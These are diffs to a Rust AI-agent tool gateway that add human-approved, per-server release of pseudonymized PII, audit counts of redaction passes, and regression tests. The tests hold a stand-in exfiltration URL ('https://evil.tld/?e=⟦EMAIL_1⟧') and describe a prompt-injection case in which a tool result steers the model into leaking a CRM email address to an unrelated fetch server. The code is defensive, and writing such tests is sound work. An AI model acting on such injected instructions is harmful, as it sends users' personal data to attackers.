+    let decision = request_human_decision(approval::ApprovalRequest {
+        token: String::new(),
+        id: new_correlation_id(),
+        client: client.map(str::to_string),
+        server: server.to_string(),
+        tool: tool.to_string(),
+        reason: approval::ApprovalReason::PiiCrossServer,
+        arguments: arguments.clone(),
+        // No fingerprint: this decision is about a value's destination, not about a tool
+        // definition, so it must never match a tool allowlist entry.
+        tool_fingerprint: None,
+        url_elicitation: None,
+        pii_release: Some(approval::PiiReleaseRequest {
+            server: server.to_string(),
+            values,
+        }),
+    });
+    // The audit record names the tokens' count via the args hash only -- `record_decision`
+    // hashes rather than stores, so the released values stay out of the log.
+    audit::record_decision(
+        server,
+        tool,
+        client,
+        "pii_cross_server",
+        decision_token(decision),
+        arguments,
+        Some(started.elapsed().as_millis() as u64),
+    );
+    if !decision.is_approved() {
+        return false;
+    }
+    let origin = pii_origin_id(server);
+    with_pii_session(client, |map| {
+        for token in refused {
+            map.approve_origin(token, &origin);
+        }
+    });
+    true
 }
 
 /// The same resolve-and-refuse pass as [`rehydrate_for_downstream`], for the MRTR
@@ -4549,6 +4657,7 @@ fn rehydrate_for_downstream(
 fn rehydrate_mrtr_for_downstream(
     client: Option<&str>,
     server: &str,
+    tool: &str,
     mrtr: Option<&MrtrRequest>,
 ) -> Result<Option<MrtrRequest>, String> {
     let Some(mrtr) = mrtr else {
@@ -4557,17 +4666,42 @@ fn rehydrate_mrtr_for_downstream(
     if mrtr.is_empty() {
         return Ok(None);
     }
-    let mut out = mrtr.clone();
     let origin = pii_origin_id(server);
-    let mut refused = std::collections::BTreeSet::new();
-    with_pii_session(client, |map| {
-        for field in [&mut out.input_responses, &mut out.request_state]
-            .into_iter()
-            .flatten()
-        {
-            refused.extend(pii::rehydrate_args(map, &origin, field));
+    // Same resolve-ask-retry shape as the arguments path. Sharing it matters: a retry
+    // response is exactly where a user has just typed the address an elicitation asked
+    // for, so leaving this half of the hop with no remedy would dead-end the workflow
+    // SBS-696 exists to unblock.
+    let pass = |out: &mut MrtrRequest| {
+        let mut refused = std::collections::BTreeSet::new();
+        with_pii_session(client, |map| {
+            for field in [&mut out.input_responses, &mut out.request_state]
+                .into_iter()
+                .flatten()
+            {
+                refused.extend(pii::rehydrate_args(map, &origin, field));
+            }
+        });
+        refused
+    };
+    let mut out = mrtr.clone();
+    let mut refused = pass(&mut out);
+    if !refused.is_empty() {
+        // The prompt shows the retry fields, not `arguments`: those are the values about
+        // to leave for this server. Built by hand under their wire names -- `MrtrRequest`
+        // is spliced into params rather than serialized, so it has no `Serialize` impl.
+        let shown = json!({
+            "inputResponses": mrtr.input_responses,
+            "requestState": mrtr.request_state,
+        });
+        if approve_pii_release(client, server, tool, &refused, &shown) {
+            let mut retry = mrtr.clone();
+            let still = pass(&mut retry);
+            if still.is_empty() {
+                return Ok(Some(retry));
+            }
+            refused = still;
         }
-    });
+    }
     if !refused.is_empty() {
         let list = refused.into_iter().collect::<Vec<_>>().join(", ");
         return Err(format!(
@@ -8917,6 +9051,7 @@ fn broker_url_elicitation(
             origin: screened.origin,
             message: screened.message,
         }),
+        pii_release: None,
     });
     match decision {
         approval::ApprovalDecision::Approved => {
@@ -12467,8 +12602,9 @@ mod tests {
         });
         let model_facing = json!({ "to": token });
 
-        let downstream = rehydrate_for_downstream(client, "crm", model_facing.clone())
-            .expect("the minting server may have its own value back");
+        let downstream =
+            rehydrate_for_downstream(client, "crm", "crm__lookup", model_facing.clone())
+                .expect("the minting server may have its own value back");
 
         assert_eq!(model_facing["to"], "⟦EMAIL_1⟧");
         assert_eq!(downstream["to"], "ada@example.com");
@@ -12486,7 +12622,7 @@ mod tests {
         });
         let exfil = json!({ "url": "https://evil.tld/?e=⟦EMAIL_1⟧" });
 
-        let err = rehydrate_for_downstream(client, "http-fetch", exfil)
+        let err = rehydrate_for_downstream(client, "http-fetch", "http_fetch__get", exfil)
             .expect_err("a foreign token must fail the call, not dispatch");
 
         assert!(err.contains("⟦EMAIL_1⟧"), "name the token: {err}");
@@ -12494,6 +12630,182 @@ mod tests {
             !err.contains("ada@example.com"),
             "the refusal must not leak the value it is protecting: {err}"
         );
+    }
+
+    /// Point the gateway's broker lookup at `dir` and publish a stub broker there that
+    /// answers every request with `decision`, handing back what it was asked.
+    ///
+    /// The descriptor lives in the data dir, so a test that does NOT call this sees no
+    /// broker at all — which is both the headless case and the reason a developer running
+    /// the real desktop app can't have these tests block on a live prompt.
+    fn stub_broker(
+        dir: &std::path::Path,
+        decision: approval::ApprovalDecision,
+    ) -> std::sync::mpsc::Receiver<approval::ApprovalRequest> {
+        let listener = TcpListener::bind(("127.0.0.1", 0)).expect("a loopback port");
+        let endpoint = listener.local_addr().expect("a bound address").to_string();
+        std::fs::write(
+            dir.join(approval::ENDPOINT_FILE),
+            serde_json::to_string(&approval::EndpointDescriptor {
+                endpoint,
+                token: "stub-broker-token".to_string(),
+            })
+            .expect("a serializable descriptor"),
+        )
+        .expect("a writable scratch dir");
+
+        let (tx, rx) = std::sync::mpsc::channel();
+        std::thread::spawn(move || {
+            use std::io::{BufRead, BufReader, Write};
+            let Ok((stream, _)) = listener.accept() else {
+                return;
+            };
+            let mut line = String::new();
+            let reader_stream = stream.try_clone().expect("a clonable stream");
+            if BufReader::new(reader_stream).read_line(&mut line).is_err() {
+                return;
+            }
+            if let Ok(req) = serde_json::from_str::<approval::ApprovalRequest>(&line) {
+                let _ = tx.send(req);
+            }
+            let mut stream = stream;
+            let answer = serde_json::to_string(&decision).expect("a serializable decision");
+            let _ = stream.write_all(answer.as_bytes());
+            let _ = stream.write_all(b"\n");
+            let _ = stream.flush();
+        });
+        rx
+    }
+
+    fn pii_scratch_dir(name: &str) -> std::path::PathBuf {
+        let dir = std::env::temp_dir().join(format!("toolport-{name}-{}", std::process::id()));
+        let _ = std::fs::remove_dir_all(&dir);
+        std::fs::create_dir_all(&dir).expect("a writable scratch dir");
+        dir
+    }
+
+    #[test]
+    fn a_cross_server_refusal_stands_when_there_is_nobody_to_ask() {
+        // SBS-696 headless: the release is a HUMAN decision, so with no reachable broker
+        // the SBS-605 refusal is unchanged. This is the case that must never fail open.
+        let _env = ENV_LOCK.lock().unwrap_or_else(|e| e.into_inner());
+        let dir = pii_scratch_dir("pii-release-headless");
+        let _data_dir = conduit_lib::registry::DataDirOverride::set(&dir);
+        // No descriptor written: nothing for the gateway to dial.
+
+        let client = Some("pii-release-headless");
+        with_pii_session(client, |map| {
+            *map = pii::SessionMap::new();
+            map.pseudonymize("crm", "ada@example.com");
+        });
+
+        let err = rehydrate_for_downstream(
+            client,
+            "mailer",
+            "mailer__send",
+            json!({ "to": "⟦EMAIL_1⟧" }),
+        )
+        .expect_err("with no broker the refusal stands");
+
+        assert!(err.contains("⟦EMAIL_1⟧"), "name the token: {err}");
+        assert!(
+            !err.contains("ada@example.com"),
+            "the refusal must not leak the value it protects: {err}"
+        );
+        // The map must be untouched: an unanswered ask may not widen anything.
+        let still_refused =
+            with_pii_session(client, |map| map.rehydrate("mailer", "⟦EMAIL_1⟧").refused);
+        assert_eq!(
+            still_refused,
+            BTreeSet::from(["⟦EMAIL_1⟧".to_string()]),
+            "an unreachable broker must not grant the origin"
+        );
+    }
+
+    #[test]
+    fn an_approved_release_lets_the_retry_resolve_for_that_server_only() {
+        // The whole point of SBS-696: read a customer from the CRM, then mail them via a
+        // different server. The first pass refuses, a human approves, the retry dispatches
+        // the real address.
+        let _env = ENV_LOCK.lock().unwrap_or_else(|e| e.into_inner());
+        let dir = pii_scratch_dir("pii-release-approved");
+        let _data_dir = conduit_lib::registry::DataDirOverride::set(&dir);
+        let asked = stub_broker(&dir, approval::ApprovalDecision::Approved);
+
+        let client = Some("pii-release-approved");
+        with_pii_session(client, |map| {
+            *map = pii::SessionMap::new();
+            map.pseudonymize("crm", "ada@example.com");
+        });
+
+        let out = rehydrate_for_downstream(
+            client,
+            "mailer",
+            "mailer__send",
+            json!({ "to": "⟦EMAIL_1⟧" }),
+        )
+        .expect("an approved release resolves on the retry");
+        assert_eq!(out["to"], "ada@example.com");
+
+        // What the human was actually shown: the destination, the token, and the real
+        // value (the broker is the one audience that may see it), plus where it came from.
+        let req = asked
+            .recv_timeout(Duration::from_secs(10))
+            .expect("a prompt");
+        assert_eq!(req.reason, approval::ApprovalReason::PiiCrossServer);
+        assert!(
+            req.tool_fingerprint.is_none(),
+            "a release must never be able to match a tool allowlist entry"
+        );
+        let release = req.pii_release.expect("the release payload");
+        assert_eq!(release.server, "mailer");
+        assert_eq!(release.values.len(), 1);
+        assert_eq!(release.values[0].token, "⟦EMAIL_1⟧");
+        assert_eq!(release.values[0].value, "ada@example.com");
+        assert_eq!(release.values[0].origins, vec!["crm".to_string()]);
+
+        // The grant is scoped to the server that was approved. A third server asking for
+        // the same value still gets the refusal.
+        let elsewhere = rehydrate_for_downstream(
+            client,
+            "evil-fetch",
+            "evil_fetch__get",
+            json!({ "url": "https://evil.tld/?e=⟦EMAIL_1⟧" }),
+        );
+        assert!(
+            elsewhere.is_err(),
+            "approving one destination must not release the value to any other"
+        );
+    }
+
+    #[test]
+    fn a_denied_release_refuses_and_grants_nothing() {
+        let _env = ENV_LOCK.lock().unwrap_or_else(|e| e.into_inner());
+        let dir = pii_scratch_dir("pii-release-denied");
+        let _data_dir = conduit_lib::registry::DataDirOverride::set(&dir);
+        let _asked = stub_broker(&dir, approval::ApprovalDecision::Denied);
+
+        let client = Some("pii-release-denied");
+        with_pii_session(client, |map| {
+            *map = pii::SessionMap::new();
+            map.pseudonymize("crm", "ada@example.com");
+        });
+
+        assert!(
+            rehydrate_for_downstream(
+                client,
+                "mailer",
+                "mailer__send",
+                json!({ "to": "⟦EMAIL_1⟧" })
+            )
+            .is_err(),
+            "a denial refuses the call"
+        );
+        // A denial must leave the map exactly as it was, so the next call re-asks rather
+        // than inheriting a grant nobody gave.
+        let still_refused =
+            with_pii_session(client, |map| map.rehydrate("mailer", "⟦EMAIL_1⟧").refused);
+        assert_eq!(still_refused, BTreeSet::from(["⟦EMAIL_1⟧".to_string()]));
     }
 
     #[test]
@@ -12511,7 +12823,7 @@ mod tests {
             request_state: Some(json!({ "draft": { "to": "⟦EMAIL_1⟧" } })),
         };
 
-        let out = rehydrate_mrtr_for_downstream(client, "mailer", Some(&mrtr))
+        let out = rehydrate_mrtr_for_downstream(client, "mailer", "mailer__send", Some(&mrtr))
             .expect("the minting server may have its own value back")
             .expect("retry fields were present, so a rewritten copy is expected");
 
@@ -12540,7 +12852,7 @@ mod tests {
             request_state: None,
         };
 
-        let err = rehydrate_mrtr_for_downstream(client, "mailer", Some(&mrtr))
+        let err = rehydrate_mrtr_for_downstream(client, "mailer", "mailer__send", Some(&mrtr))
             .expect_err("a foreign token in a retry must fail the call too");
 
         assert!(err.contains("⟦EMAIL_1⟧"), "name the token: {err}");
@@ -12550,13 +12862,20 @@ mod tests {
     #[test]
     fn absent_mrtr_needs_no_rewritten_copy() {
         let client = Some("pii-mrtr-absent");
-        assert!(rehydrate_mrtr_for_downstream(client, "mailer", None)
-            .expect("no retry fields is not a failure")
-            .is_none());
         assert!(
-            rehydrate_mrtr_for_downstream(client, "mailer", Some(&MrtrRequest::default()))
-                .expect("empty retry fields are not a failure")
-                .is_none(),
+            rehydrate_mrtr_for_downstream(client, "mailer", "mailer__send", None)
+                .expect("no retry fields is not a failure")
+                .is_none()
+        );
+        assert!(
+            rehydrate_mrtr_for_downstream(
+                client,
+                "mailer",
+                "mailer__send",
+                Some(&MrtrRequest::default())
+            )
+            .expect("empty retry fields are not a failure")
+            .is_none(),
             "an empty MrtrRequest must keep the caller on the original borrow"
         );
     }
@@ -12590,7 +12909,7 @@ mod tests {
         assert_eq!(sanitized, "my_crm", "guard the premise of this test");
         let args = json!({ "to": "⟦EMAIL_1⟧" });
 
-        let out = rehydrate_for_downstream(client, &sanitized, args)
+        let out = rehydrate_for_downstream(client, &sanitized, "my_crm__send", args)
             .expect("a tool on the same server must get its own value back");
         assert_eq!(
             out["to"], "ada@example.com",
@@ -13678,6 +13997,7 @@ mod tests {
             arguments: serde_json::json!({}),
             tool_fingerprint: Some("v2:abc".into()),
             url_elicitation: None,
+            pii_release: None,
         };
         // No endpoint descriptor (Toolport app not running) -> Unreachable (fail-closed),
         // distinct from a human Timeout so the caller can explain *why* it was blocked.

--- a/src-tauri/src/bin/toolport-gateway.rs
+++ b/src-tauri/src/bin/toolport-gateway.rs
@@ -4231,7 +4231,8 @@ fn execute_call(
             } else {
                 recovery_hint(cached, srv)
             };
-            let out = defend_and_shape(reg, srv, tool, client, result, &trailer, shape);
+            let Defended { result: out, pii } =
+                defend_and_shape(reg, srv, tool, client, result, &trailer, shape);
             if let Some(profiler) = &mut call_profiler {
                 profiler.mark_postprocess();
             }
@@ -4242,7 +4243,7 @@ fn execute_call(
                 .and_then(|v| v.as_bool())
                 .unwrap_or(false);
             let err = if ok { None } else { Some(content_text(&out)) };
-            audit::record_timed_with_hash(
+            audit::record_timed_with_pii(
                 srv,
                 tool,
                 ok,
@@ -4250,6 +4251,7 @@ fn execute_call(
                 err.as_deref(),
                 client,
                 Some(&call_args_hash),
+                pii,
             );
             if let Some(profiler) = call_profiler {
                 profiler.finish();
@@ -4259,15 +4261,6 @@ fn execute_call(
         Err(e) => {
             finish_modern_hitl(active_modern_hitl.as_deref());
             let ms = started.elapsed().as_millis() as u64;
-            audit::record_timed_with_hash(
-                srv,
-                tool,
-                false,
-                Some(ms),
-                Some(&e),
-                client,
-                Some(&call_args_hash),
-            );
             // Live inspection: capture the failed call too, with the error
             // as the response body. Only when live_inspect is on.
             if let Some(req) = &inspect_args {
@@ -4283,7 +4276,10 @@ fn execute_call(
                 "content": [{ "type": "text", "text": e }],
                 "isError": true,
             });
-            defend_and_shape(
+            // Defend first, then audit: the error text runs through the same PII pass as
+            // a successful result, and the audit row has to carry that pass's count like
+            // the success path does (SBS-607).
+            let Defended { result: out, pii } = defend_and_shape(
                 reg,
                 srv,
                 tool,
@@ -4291,7 +4287,18 @@ fn execute_call(
                 result,
                 &recovery_hint(cached, srv),
                 shape,
-            )
+            );
+            audit::record_timed_with_pii(
+                srv,
+                tool,
+                false,
+                Some(ms),
+                Some(&e),
+                client,
+                Some(&call_args_hash),
+                pii,
+            );
+            out
         }
     }
 }
@@ -4606,7 +4613,11 @@ fn rehydrated_for_local_approver(
     copy
 }
 
-/// An incomplete pass is logged. This path fails OPEN -- a full map or an over-cap
+/// `None` when PII redaction is off for this call. `Some` carries the count and the
+/// `complete` flag out to the audit record, so Activity can show "N values
+/// pseudonymized" and, crucially, flag a pass that did not fully apply (SBS-607).
+///
+/// An incomplete pass is also logged. This path fails OPEN -- a full map or an over-cap
 /// result leaves values in the clear -- and the whole point of returning
 /// `complete` was so that could be noticed rather than assumed away.
 fn pseudonymize_if_enabled(
@@ -4614,9 +4625,9 @@ fn pseudonymize_if_enabled(
     client: Option<&str>,
     server: &str,
     result: &mut Value,
-) -> usize {
+) -> Option<audit::PiiPass> {
     if !reg.pii_redaction_effective() {
-        return 0;
+        return None;
     }
     let origin = pii_origin_id(server);
     let out = with_pii_session(client, |map| pii::pseudonymize_result(map, &origin, result));
@@ -4625,7 +4636,10 @@ fn pseudonymize_if_enabled(
             "toolport: PII pseudonymization was incomplete for this result - some values reached the model in the clear (the session map is full, or the result exceeded the scan cap)."
         );
     }
-    out.replaced
+    Some(audit::PiiPass {
+        replaced: out.replaced,
+        complete: out.complete,
+    })
 }
 
 fn defend_and_shape(
@@ -4636,14 +4650,14 @@ fn defend_and_shape(
     mut result: Value,
     trailer: &str,
     shape: bool,
-) -> Value {
+) -> Defended {
     // Scan untrusted output for injection; label always, optionally fail closed.
     // Block mode alone must still run the scanner: an org forceBlockOnInjection (or a
     // local blockOnInjection) with contentDefense off would otherwise silently do
     // nothing (SOU-345).
     // PII first, then injection defense: the wrap must go around already-
     // pseudonymized text, not the other way round.
-    pseudonymize_if_enabled(reg, client, srv, &mut result);
+    let pii = pseudonymize_if_enabled(reg, client, srv, &mut result);
     if reg.content_defense_effective() || reg.block_on_injection_effective() {
         let block = reg.should_block_injection_for(srv);
         if let Some(msg) = integrity::defend_content(srv, tool, &mut result, block) {
@@ -4681,7 +4695,19 @@ fn defend_and_shape(
             arr.push(json!({ "type": "text", "text": trailer }));
         }
     }
-    result
+    Defended { result, pii }
+}
+
+/// [`defend_and_shape`]'s output: the agent-facing result, plus what the PII pass did on
+/// the way through.
+///
+/// The pass runs deep inside this function but has to reach the audit record the CALLER
+/// writes, so it rides back out here rather than being logged in two places or
+/// recomputed (SBS-607).
+struct Defended {
+    result: Value,
+    /// `None` when PII redaction was off for this call -- see [`pseudonymize_if_enabled`].
+    pii: Option<audit::PiiPass>,
 }
 
 /// Exposed tool names for code-mode `servers.*` stubs: full catalog minus gateway
@@ -12552,8 +12578,12 @@ mod tests {
         let mut result = json!({
             "contents": [{ "type": "text", "text": "owner ada@example.com" }]
         });
-        let replaced = pseudonymize_if_enabled(&reg, client, "my-crm", &mut result);
-        assert_eq!(replaced, 1, "the resource text should have been tokenized");
+        let pass = pseudonymize_if_enabled(&reg, client, "my-crm", &mut result)
+            .expect("redaction is on, so the pass must be reported");
+        assert_eq!(
+            pass.replaced, 1,
+            "the resource text should have been tokenized"
+        );
 
         // Then dispatch the way execute_call does: the sanitized id.
         let sanitized = sanitize_segment("my-crm");
@@ -12565,6 +12595,80 @@ mod tests {
         assert_eq!(
             out["to"], "ada@example.com",
             "resource-minted PII must resolve for a tool on the same server"
+        );
+    }
+
+    #[test]
+    fn defend_and_shape_reports_the_pii_pass_to_the_audit_caller() {
+        // SBS-607: the count is computed deep inside defend_and_shape, but the audit
+        // record is written by its caller, so the pass has to survive the return.
+        let client = Some("pii-audit-pass");
+        let mut reg = Registry::default();
+        let body = |text: &str| json!({ "content": [{ "type": "text", "text": text }] });
+        let rendered = |v: &Value| serde_json::to_string(v).expect("a JSON result");
+
+        // Redaction off reports NO pass. "Not enabled" and "enabled, found nothing" are
+        // different facts, and a zero pass here would make an untouched call read as a
+        // clean redaction.
+        with_pii_session(client, |map| *map = pii::SessionMap::new());
+        let off = defend_and_shape(
+            &reg,
+            "crm",
+            "crm__lookup",
+            client,
+            body("ada@example.com"),
+            "",
+            true,
+        );
+        assert!(
+            off.pii.is_none(),
+            "redaction is off, so no pass is reported"
+        );
+        assert!(
+            rendered(&off.result).contains("ada@example.com"),
+            "guard the premise: with redaction off nothing was rewritten"
+        );
+
+        // On, and the pass fully applied.
+        reg.pii_redaction = true;
+        with_pii_session(client, |map| *map = pii::SessionMap::new());
+        let on = defend_and_shape(
+            &reg,
+            "crm",
+            "crm__lookup",
+            client,
+            body("ada@example.com and bob@example.com"),
+            "",
+            true,
+        );
+        let pass = on.pii.expect("redaction is on, so a pass must be reported");
+        assert_eq!(pass.replaced, 2, "both addresses were tokenized");
+        assert!(pass.complete, "nothing was left in the clear");
+
+        // A full map leaves values in the clear. This path fails OPEN by design, so an
+        // incomplete pass is precisely what the flag exists to surface -- without it the
+        // call is indistinguishable from a clean one.
+        with_pii_session(client, |map| *map = pii::SessionMap::with_capacity(1));
+        let leaky = defend_and_shape(
+            &reg,
+            "crm",
+            "crm__lookup",
+            client,
+            body("ada@example.com and bob@example.com"),
+            "",
+            true,
+        );
+        let pass = leaky
+            .pii
+            .expect("redaction is on, so a pass must be reported");
+        assert_eq!(pass.replaced, 1, "only the first value fit in the map");
+        assert!(
+            !pass.complete,
+            "the second value reached the model in the clear"
+        );
+        assert!(
+            rendered(&leaky.result).contains("bob@example.com"),
+            "guard the premise: the unmapped value really is still in the clear"
         );
     }
 
@@ -12943,7 +13047,8 @@ mod tests {
             "content": [{ "type": "text", "text": payload }],
             "isError": true,
         });
-        let out = defend_and_shape(&reg, "evil-server", "evil__tool", None, result, "", true);
+        let out =
+            defend_and_shape(&reg, "evil-server", "evil__tool", None, result, "", true).result;
         let text = out["content"][0]["text"].as_str().unwrap();
         assert!(
             text.contains("external data"),
@@ -12960,7 +13065,7 @@ mod tests {
             "content": [{ "type": "text", "text": "e".repeat(200_000) }],
             "isError": true,
         });
-        let shaped = defend_and_shape(&reg, "srv", "srv__t", None, huge, "", true);
+        let shaped = defend_and_shape(&reg, "srv", "srv__t", None, huge, "", true).result;
         let shaped_text = shaped["content"][0]["text"].as_str().unwrap();
         assert!(
             shaped_text.len() < 200_000,
@@ -12980,7 +13085,8 @@ mod tests {
             clean,
             "Try list_things first.",
             true,
-        );
+        )
+        .result;
         let blocks = with_hint["content"].as_array().unwrap();
         let trailer = blocks.last().unwrap()["text"].as_str().unwrap();
         assert_eq!(trailer, "Try list_things first.");
@@ -13000,7 +13106,8 @@ mod tests {
         let result = json!({
             "content": [{ "type": "text", "text": payload }],
         });
-        let out = defend_and_shape(&reg, "evil-server", "evil__tool", None, result, "", true);
+        let out =
+            defend_and_shape(&reg, "evil-server", "evil__tool", None, result, "", true).result;
         assert_eq!(out["isError"], true, "blocked call must be isError");
         let text = out["content"][0]["text"].as_str().unwrap();
         assert!(text.contains("blocked"), "security message");
@@ -13019,7 +13126,8 @@ mod tests {
         let result = json!({
             "content": [{ "type": "text", "text": payload }],
         });
-        let out = defend_and_shape(&reg, "evil-server", "evil__tool", None, result, "", true);
+        let out =
+            defend_and_shape(&reg, "evil-server", "evil__tool", None, result, "", true).result;
         assert_ne!(
             out["content"][0]["text"]
                 .as_str()
@@ -13041,7 +13149,8 @@ mod tests {
         let result = json!({
             "content": [{ "type": "text", "text": payload }],
         });
-        let out = defend_and_shape(&reg, "evil-server", "evil__tool", None, result, "", true);
+        let out =
+            defend_and_shape(&reg, "evil-server", "evil__tool", None, result, "", true).result;
         assert!(out["content"][0]["text"]
             .as_str()
             .unwrap()
@@ -13060,7 +13169,8 @@ mod tests {
         let result = json!({
             "content": [{ "type": "text", "text": payload }],
         });
-        let out = defend_and_shape(&reg, "evil-server", "evil__tool", None, result, "", true);
+        let out =
+            defend_and_shape(&reg, "evil-server", "evil__tool", None, result, "", true).result;
         assert_eq!(out["isError"], true);
         assert!(
             out["content"][0]["text"]

--- a/src-tauri/src/bin/toolport-gateway.rs
+++ b/src-tauri/src/bin/toolport-gateway.rs
@@ -12615,6 +12615,9 @@ mod tests {
         // SBS-605 at the dispatch boundary: an injected result talks the model into
         // putting the CRM's customer address in a URL for an unrelated fetch tool.
         // This is the call that must never leave the machine.
+        // Refusal path: needs a guaranteed-broker-free env, or a stub broker published by
+        // a concurrent test would approve the release this test exists to prevent.
+        let _env = pii_test_env("pii-cross-server-regression");
         let client = Some("pii-cross-server-regression");
         with_pii_session(client, |map| {
             *map = pii::SessionMap::new();
@@ -12632,12 +12635,41 @@ mod tests {
         );
     }
 
-    /// Point the gateway's broker lookup at `dir` and publish a stub broker there that
-    /// answers every request with `decision`, handing back what it was asked.
+    /// A serialized, broker-free environment for a test that can hit the PII dispatch path.
     ///
-    /// The descriptor lives in the data dir, so a test that does NOT call this sees no
-    /// broker at all — which is both the headless case and the reason a developer running
-    /// the real desktop app can't have these tests block on a live prompt.
+    /// EVERY test that can produce a cross-server refusal must hold one, because the
+    /// refusal now dials the approval broker (SBS-696) and the data-dir override deciding
+    /// whether a broker exists is process-GLOBAL. Without this, a refusal test running
+    /// beside [`stub_broker`] dials that stub, is approved, and both tests fail: the
+    /// refusal test because its value was released, and the stub's owner because its one
+    /// `accept()` was consumed. That is exactly how this first failed on CI.
+    ///
+    /// Holding it also means a developer with the real desktop app running cannot have
+    /// these tests block on a live human prompt: the scratch dir has no descriptor unless
+    /// the test puts one there.
+    struct PiiTestEnv {
+        dir: std::path::PathBuf,
+        // Declaration order IS drop order: release the override before the lock, so the
+        // next test never observes this scratch dir.
+        _data_dir: conduit_lib::registry::DataDirOverride,
+        _env: std::sync::MutexGuard<'static, ()>,
+    }
+
+    fn pii_test_env(name: &str) -> PiiTestEnv {
+        let env = ENV_LOCK.lock().unwrap_or_else(|e| e.into_inner());
+        let dir = std::env::temp_dir().join(format!("toolport-{name}-{}", std::process::id()));
+        let _ = std::fs::remove_dir_all(&dir);
+        std::fs::create_dir_all(&dir).expect("a writable scratch dir");
+        let data_dir = conduit_lib::registry::DataDirOverride::set(&dir);
+        PiiTestEnv {
+            dir,
+            _data_dir: data_dir,
+            _env: env,
+        }
+    }
+
+    /// Publish a stub broker into `env`'s data dir that answers one request with
+    /// `decision`, handing back what it was asked.
     fn stub_broker(
         dir: &std::path::Path,
         decision: approval::ApprovalDecision,
@@ -12677,21 +12709,12 @@ mod tests {
         rx
     }
 
-    fn pii_scratch_dir(name: &str) -> std::path::PathBuf {
-        let dir = std::env::temp_dir().join(format!("toolport-{name}-{}", std::process::id()));
-        let _ = std::fs::remove_dir_all(&dir);
-        std::fs::create_dir_all(&dir).expect("a writable scratch dir");
-        dir
-    }
-
     #[test]
     fn a_cross_server_refusal_stands_when_there_is_nobody_to_ask() {
         // SBS-696 headless: the release is a HUMAN decision, so with no reachable broker
         // the SBS-605 refusal is unchanged. This is the case that must never fail open.
-        let _env = ENV_LOCK.lock().unwrap_or_else(|e| e.into_inner());
-        let dir = pii_scratch_dir("pii-release-headless");
-        let _data_dir = conduit_lib::registry::DataDirOverride::set(&dir);
-        // No descriptor written: nothing for the gateway to dial.
+        // No stub broker published into this env: nothing for the gateway to dial.
+        let _env = pii_test_env("pii-release-headless");
 
         let client = Some("pii-release-headless");
         with_pii_session(client, |map| {
@@ -12727,10 +12750,8 @@ mod tests {
         // The whole point of SBS-696: read a customer from the CRM, then mail them via a
         // different server. The first pass refuses, a human approves, the retry dispatches
         // the real address.
-        let _env = ENV_LOCK.lock().unwrap_or_else(|e| e.into_inner());
-        let dir = pii_scratch_dir("pii-release-approved");
-        let _data_dir = conduit_lib::registry::DataDirOverride::set(&dir);
-        let asked = stub_broker(&dir, approval::ApprovalDecision::Approved);
+        let env = pii_test_env("pii-release-approved");
+        let asked = stub_broker(&env.dir, approval::ApprovalDecision::Approved);
 
         let client = Some("pii-release-approved");
         with_pii_session(client, |map| {
@@ -12780,10 +12801,8 @@ mod tests {
 
     #[test]
     fn a_denied_release_refuses_and_grants_nothing() {
-        let _env = ENV_LOCK.lock().unwrap_or_else(|e| e.into_inner());
-        let dir = pii_scratch_dir("pii-release-denied");
-        let _data_dir = conduit_lib::registry::DataDirOverride::set(&dir);
-        let _asked = stub_broker(&dir, approval::ApprovalDecision::Denied);
+        let env = pii_test_env("pii-release-denied");
+        let _asked = stub_broker(&env.dir, approval::ApprovalDecision::Denied);
 
         let client = Some("pii-release-denied");
         with_pii_session(client, |map| {
@@ -12842,6 +12861,8 @@ mod tests {
 
     #[test]
     fn mrtr_retry_fields_refuse_another_servers_token() {
+        // Same reason as the arguments-path refusal above: this dials the broker now.
+        let _env = pii_test_env("pii-mrtr-cross-server");
         let client = Some("pii-mrtr-cross-server");
         with_pii_session(client, |map| {
             *map = pii::SessionMap::new();

--- a/src-tauri/src/pii.rs
+++ b/src-tauri/src/pii.rs
@@ -32,9 +32,12 @@
 //! whole attack.
 //!
 //! The practical cost is real: reading a customer from a CRM and emailing them via
-//! a different server no longer works unattended. That is a deliberate trade, and
-//! re-enabling it behind an explicit per-value approval is follow-up work, not
-//! something to quietly relax here.
+//! a different server does not work unattended. That is a deliberate trade. The remedy
+//! is an explicit human decision, never a relaxation of the rule: [`SessionMap::approve_origin`]
+//! adds ONE server to ONE value's origins after a person is shown the value and the
+//! destination (SBS-696). Approvals live in the map and die with it, and there is
+//! deliberately no blanket per-server grant -- that would rebuild the channel above.
+//! With no one to ask (headless, or the desktop app not running) the refusal stands.
 
 use std::collections::{BTreeSet, HashMap};
 use std::sync::OnceLock;
@@ -264,6 +267,16 @@ pub struct Rehydrated {
     pub refused: BTreeSet<String>,
 }
 
+/// What a token actually stands for, borrowed from the map for a local approval prompt.
+///
+/// `value` is real PII. See [`SessionMap::disclose`] for the only caller allowed to ask.
+pub struct Disclosed<'a> {
+    pub value: &'a str,
+    /// Servers already entitled to receive it -- the ones that produced it, plus any a
+    /// human has since approved.
+    pub origins: &'a BTreeSet<String>,
+}
+
 /// The outcome of a pseudonymization pass.
 pub struct Pseudonymized {
     pub text: String,
@@ -377,6 +390,47 @@ impl SessionMap {
             replaced,
             complete: !passed_through && !truncated,
         }
+    }
+
+    /// Grant `target` the right to receive the value behind `token`.
+    ///
+    /// This is the ONLY way a value crosses servers, and it exists so a human can unblock
+    /// the workflow the origin scoping otherwise dead-ends: read a customer from a CRM,
+    /// then email them via a different server (SBS-696). Without it the refusal in
+    /// [`Self::rehydrate`] has no remedy at all.
+    ///
+    /// Deliberately per (value, target). Approving `⟦EMAIL_1⟧` for a mail server says
+    /// nothing about `⟦EMAIL_2⟧`, and nothing about any other server. A blanket "this
+    /// server may read anything" grant would rebuild the exact channel SBS-605 closed,
+    /// because the next injected result could name any token it liked.
+    ///
+    /// Returns false for a token this map never minted. There is no value behind it to
+    /// grant, and inserting one here would let a caller manufacture origins for a token
+    /// the model invented.
+    pub fn approve_origin(&mut self, token: &str, target: &str) -> bool {
+        match self.by_token.get_mut(token) {
+            Some(entry) => {
+                entry.origins.insert(target.to_string());
+                true
+            }
+            None => false,
+        }
+    }
+
+    /// The real value behind `token`, and the servers already known to have produced it.
+    ///
+    /// This hands back un-pseudonymized PII, which is the one thing the rest of this module
+    /// exists to prevent, so it has exactly one legitimate caller: building the local
+    /// approval prompt for [`Self::approve_origin`]. A person cannot decide whether to
+    /// release a value to another server without seeing which value it is, and the loopback
+    /// broker is already the single audience that sees real arguments before dispatch.
+    ///
+    /// It must never reach the model, a log, or anything persisted.
+    pub fn disclose(&self, token: &str) -> Option<Disclosed<'_>> {
+        self.by_token.get(token).map(|entry| Disclosed {
+            value: entry.value.as_str(),
